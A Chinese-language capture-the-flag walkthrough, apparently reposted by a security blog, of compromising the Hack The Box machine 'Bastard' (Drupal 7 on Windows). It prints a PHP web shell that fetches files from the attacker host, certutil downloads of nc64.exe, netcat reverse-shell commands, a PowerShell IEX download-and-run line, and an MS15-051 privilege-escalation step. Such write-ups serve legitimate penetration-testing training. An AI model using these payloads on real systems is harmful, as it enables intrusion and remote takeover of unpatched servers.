【安全新闻】HTB:Bastard渗透测试

基础信息

简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透
链接:https://www.hackthebox.eu/home/machines/profile/7
描述:【安全新闻】HTB:Bastard渗透测试

一、信息收集

1、靶机ip

IP地址为:10.129.115.58

2、靶机端口与服务
nmap -sV -A -O -T4 10.129.115.58

开放了80,135和49154端口,并且可知80端口是由Drupal 7 CMS搭建的服务器
【安全新闻】HTB:Bastard渗透测试1

3、网站信息收集

进入80端口,通过robots.txt找到CHANGELOG.txt知道Drupal 的具体版本
可以通过该该版本查询存在的攻击载荷
【安全新闻】HTB:Bastard渗透测试2

二、漏洞探测与利用

通过searchsploit查询可利用版本
【安全新闻】HTB:Bastard渗透测试3
利用该脚本之前需要对该脚本进行修改
通过dirb扫描目录获取发现存在/rest目录
【安全新闻】HTB:Bastard渗透测试4
【安全新闻】HTB:Bastard渗透测试5
执行脚本前需要安装php-curl否则无法运行成功
apt-get install php-curl
【安全新闻】HTB:Bastard渗透测试6
命令执行成功
【安全新闻】HTB:Bastard渗透测试7
反弹shell
方法一:通过certutil命令将nc下载到靶机中

http://10.129.115.43/shell.php?cmd=certutil -urlcache -f http://10.10.14.58:8001/nc64.exe nc64.exe 下载nc
http://10.129.115.43/shell.php?cmd=nc64.exe 10.10.14.58 1234 -e cmd  反弹shell

【安全新闻】HTB:Bastard渗透测试8
成功获取shell
【安全新闻】HTB:Bastard渗透测试9
方法二:编写php代码(由于重启了靶机所以ip地址不一样)
利用php编写文件上传代码将nc64.exe上传到靶机中进行利用

$url = 'http://10.129.115.154';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

$phpCode = <<<'EOD'
<?php
        if (isset($_REQUEST['fupload'])) {
                file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.14.16:8001/" . $_REQUEST['fupload']));
    };

        if (isset($_REQUEST['cmd'])) {
                echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
        };
?>
EOD;


$file = [
    'filename' => 'exploit.php',
    'data' => $phpCode
];

【安全新闻】HTB:Bastard渗透测试10
脚本执行成功,上传nc
http://10.129.115.154/exploit.php?fupload=nc64.exe
执行nc64.exe 获取shell
【安全新闻】HTB:Bastard渗透测试11

三、提权

systeminfo查询该计算机的相关信息

【安全新闻】HTB:Bastard渗透测试12

使用Sherlock.ps1查找系统缺少的版本补丁与漏洞
链接:https://github.com/rasta-mouse/Sherlock
在运行该脚本前需要在脚本中添加Find-ALLvulns查找所有漏洞

【安全新闻】HTB:Bastard渗透测试13

http://10.129.115.58/shell.php?cmd=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.58:8001/Sherlock.ps1') | powershell -noprofile -

这次使用MS15-051进行提权
【安全新闻】HTB:Bastard渗透测试14
将ms15-051×64.exe下载到靶机中并命名为Shell.exe
使用nc反弹shell

certutil -urlcache -f http://10.10.14.58:8000/ms15-051x64.exe Shell.exe 
Shell.exe "nc64.exe 10.10.14.58 4242 -e cmd.exe"

【安全新闻】HTB:Bastard渗透测试15
成功获取到root权限

【安全新闻】HTB:Bastard渗透测试16

【安全新闻】HTB:Bastard渗透测试17

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
大佬不来一句? 抢沙发

请登录后发表评论